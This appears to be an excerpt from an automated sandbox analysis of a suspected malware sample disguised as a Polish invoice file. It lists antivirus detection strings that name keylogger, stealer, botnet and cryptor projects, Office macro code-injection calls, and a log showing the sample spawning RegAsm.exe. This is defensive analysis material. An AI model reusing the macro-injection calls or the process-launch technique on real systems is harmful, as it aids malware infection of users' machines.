    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: ?:.+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: \Virus\Romeo.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: .:\\Explorer\\Explorer.vbp
    Source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmpBinary or memory string: .vbpa)
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpBinary or memory string: DC:\Base de donnee\test\Projet1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpBinary or memory string: stub.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: .+keylogger.+server\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: -(.+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: \\cryptor.+\\Project1\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpBinary or memory string: Desktop\Russia\Error.vbp
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpBinary or memory string: \AYO.vbp
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpBinary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: :5.+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpBinary or memory string: AC:\puxa\lenda.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpBinary or memory string: .vbp
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpBinary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: .+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: BD:\Master\bb_soft\not_est\dll.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: MH.+:\\Documents and Settings\\User\\Desktop\\.*pia de.*fab\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmpBinary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpBinary or memory string: cMicroLab.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpBinary or memory string: C>:\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: D:\\Apple\\VB.*google\\.*\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpBinary or memory string: TroyanExplore\Instalar.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpBinary or memory string: 8my programs\I_R\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: .+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpBinary or memory string: B*\AF:\learn\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpBinary or memory string: nh AV\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: \gugu.vbp]
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpBinary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpBinary or memory string: HKnamemom.vbpa
    Source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmpBinary or memory string: \Simplesso.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: <\ALLROUND STEALER\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmpBinary or memory string: -powerword\PowerWord.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpBinary or memory string: \Bonus 1.5.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpBinary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: 6@*\AC:\server\Tarantula.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpBinary or memory string: hider\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: ysp\ysp.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpBinary or memory string: >\YPKISS~1\ULTIMA~1\ULTIMA~1.VBP
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: :Black Dream\Server\Server.vbp]
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: <7.+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: d_C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpBinary or memory string: 8\MicroProCon\FileConfig.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpBinary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: |C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpBinary or memory string: ..\Desktop\Startup\Bitar.vbp
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpBinary or memory string: .+:\\SO_GF\\puxador\\office.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: fzx9823.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpBinary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpBinary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: .+\\Virus Maker\\s1\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: C:\\.+\\www.microfost.com -3.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: ,'.+:\\afron\\Loader.*VB.+\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpBinary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown | Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
    Source: unknown | Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe' /q WD
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe | Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.265.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe /q WD
    Source: unknown | Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man
    Source: C:\Windows\System32\wevtutil.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown | Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
    Source: C:\Windows\System32\wevtutil.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe | Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.265.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe /q WD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;SELECT Count(1) FROM BackupProcessInfo;SELECT ID FROM BackupProcessInfo WHERE Key = ?;INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);DELETE FROM BackupProcessInfo WHERE Key = ?;DELETE FROM BackupProcessInfo WHERE InstanceTimeStamp < ?; ^;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;N
    Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Count(1) FROM SystemFileCache;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Count(1) FROM SdnEx;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID from File WHERE SHA1 = ? ;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Count(1) FROM SystemRegistryCache;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
